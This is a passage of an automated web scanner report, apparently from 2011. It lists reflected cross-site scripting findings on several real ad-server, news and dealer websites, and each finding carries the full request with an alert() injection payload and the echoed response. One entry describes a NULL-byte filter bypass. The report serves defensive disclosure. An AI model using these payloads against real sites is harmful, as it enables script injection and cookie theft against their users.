The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d85'-alert(1)-'9595c27d68e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]20d85'-alert(1)-'9595c27d68e/no?[countgo] HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:54:12 GMT
Content-Length: 360


document.write('<a target="_blank" href="http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B7653005851078549651%3B[timestamp]20d85'-alert(1)-'9595c27d68e%3BM%3B4107228%3Bclickvars=">
...[SNIP]...

2.100. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [[countgo] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no

Issue detail

The value of the [countgo] request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7adb'%3balert(1)//9c59d422aa1 was submitted in the [countgo] parameter. This input was echoed as b7adb';alert(1)//9c59d422aa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo]b7adb'%3balert(1)//9c59d422aa1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: ASPSESSIONIDQQDCCDAR=NLMKNGDBDAAJEJEPCMNIIBEE; path=/
Date: Sat, 23 Apr 2011 17:37:25 GMT
Set-Cookie: BIGipServerSMART2=1678181130.20480.0000; path=/
Content-Length: 355


document.write('<a target="_blank" href="[countgo]b7adb';alert(1)//9c59d422aa1http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B0%3B%5btimestamp%5d%3BM%3B4107228%3Bclickvars=">
...[SNIP]...

2.101. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353ce'%3balert(1)//ef8e1dee706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353ce';alert(1)//ef8e1dee706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo]&353ce'%3balert(1)//ef8e1dee706=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: ASPSESSIONIDCAQBRTDS=CCHIPEABOMHDBGNJMOFPFFCD; path=/
Date: Sat, 23 Apr 2011 17:38:52 GMT
Set-Cookie: BIGipServerSMART2=1325859594.23040.0000; path=/
Content-Length: 358


document.write('<a target="_blank" href="[countgo]&353ce';alert(1)//ef8e1dee706=1http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B0%3B%5btimestamp%5d%3BM%3B4107228%3Bclickvars=">
...[SNIP]...

2.102. http://www4.smartadserver.com/call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no [[countgo] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no

Issue detail

The value of the [countgo] request parameter is copied into the HTML document as plain text between tags. The payload 1e510<script>alert(1)</script>45afb62f8ad was submitted in the [countgo] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no?[countgo]1e510<script>alert(1)</script>45afb62f8ad HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:37:18 GMT
Content-Length: 554

if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}

document.write('<a target="_blank" href="[countgo]1e510<script>alert(1)</script>45afb62f8adhttp://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B7410644682171171254%3B%5btimestamp%5d%3BM%3B4107228%3Bclickvars=">
...[SNIP]...

2.103. http://www4.smartadserver.com/call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a6bc<script>alert(1)</script>7ab968a4c2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no?[countgo]&4a6bc<script>alert(1)</script>7ab968a4c2a=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:42:21 GMT
Content-Length: 557

if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}

document.write('<a target="_blank" href="[countgo]&4a6bc<script>alert(1)</script>7ab968a4c2a=1http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B6851131488443450911%3B%5btimestamp%5d%3BM%3B4107228%3Bclickvars=">
...[SNIP]...

2.104. http://www.informationweek.com/news/security/attacks/229402094 [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/attacks/229402094

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00e289a"-alert(1)-"81fc8afb6e1 was submitted in the User-Agent HTTP header. This input was echoed as e289a"-alert(1)-"81fc8afb6e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /news/security/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16%00e289a"-alert(1)-"81fc8afb6e1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:15:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=7p150rd1qiun0ol6uj84frcks1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:07 GMT
Content-Type: text/html
Content-Length: 91604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
elecom";
s.prop6="";
s.prop7="Mathew J. Schwartz";
s.prop8="173.193.214.243 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16%00e289a"-alert(1)-"81fc8afb6e1";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="20110422";
s.prop21="";

/* Conversion Variables */
s.campaign="";
s.state=""
...[SNIP]...

2.105. http://www.nextadvisor.com/identity_theft_protection_services/index.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /identity_theft_protection_services/index.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41842"><script>alert(1)</script>4b6f05419af was submitted in the Referer HTTP header. This input was echoed as 41842\"><script>alert(1)</script>4b6f05419af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=41842"><script>alert(1)</script>4b6f05419af

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:21:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=247e4d5614b278690989ad92e5426e41; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 35845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href="/link.php?kw=gid9a identity theft resource-fq-41842\"><script>alert(1)</script>4b6f05419af_ordering176&amp;category=identitytheft&amp;link=idguard&amp;id=223" target="_blank">
...[SNIP]...

2.106. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.volkswagensouthburlington.com
Path:   /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d90a'-alert(1)-'ff7f2bdc6e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=3d90a'-alert(1)-'ff7f2bdc6e0

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:13 GMT
Connection: close
Set-Cookie: ssoid=8310f0e90a0a006e00d46b954045410c;path=/
Set-Cookie: JSESSIONID=3ia0vdueobjf5;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 74136

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms22.dealer.ddc p7070 -->

   <title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=3d90a'-alert(1)-'ff7f2bdc6e0',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'USED_VEHICLE_DETA
...[SNIP]...

2.107. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.volkswagensouthburlington.com
Path:   /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff1a"><script>alert(1)</script>95b497433a1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=eff1a"><script>alert(1)</script>95b497433a1

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:11 GMT
Connection: close
Set-Cookie: ssoid=8310e6320a0a006e00d46b957ebc568a;path=/
Set-Cookie: JSESSIONID=re5c5k752csh;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 74166

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms22.dealer.ddc p7070 -->

   <title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=eff1a"><script>alert(1)</script>95b497433a1&amp;20=www.volkswagensouthburlington.com&amp;21=/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&amp;50=8310e6320a0a006e00d46b957ebc568a&amp;51=&amp;52=&amp;53=&a
...[SNIP]...

2.108. http://a.collective-media.net/cmadj/iblocal.rubiconmcclatchy.ron/audience [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.rubiconmcclatchy.ron/audience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b12e0"%3balert(1)//bfb8dac7af7 was submitted in the cli cookie. This input was echoed as b12e0";alert(1)//bfb8dac7af7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989eb12e0"%3balert(1)//bfb8dac7af7; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:04 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:04 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Content-Length: 7706

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f8f328940989eb12e0";alert(1)//bfb8dac7af7&seg_code=noseg&ord=1303614664",true);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=187524340;re
...[SNIP]...

2.109. http://ar.voicefive.com/b/node_rcAll.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 83651<script>alert(1)</script>1021085a0ae was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1303613738787 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; BMX_3PC=183651<script>alert(1)</script>1021085a0ae

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:17:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Tue 29-Jul-2008 03:17:38 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 248

COMSCORE.BMX.Buddy.run({ "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '183651<script>alert(1)</script>1021085a0ae', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' });

2.110. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

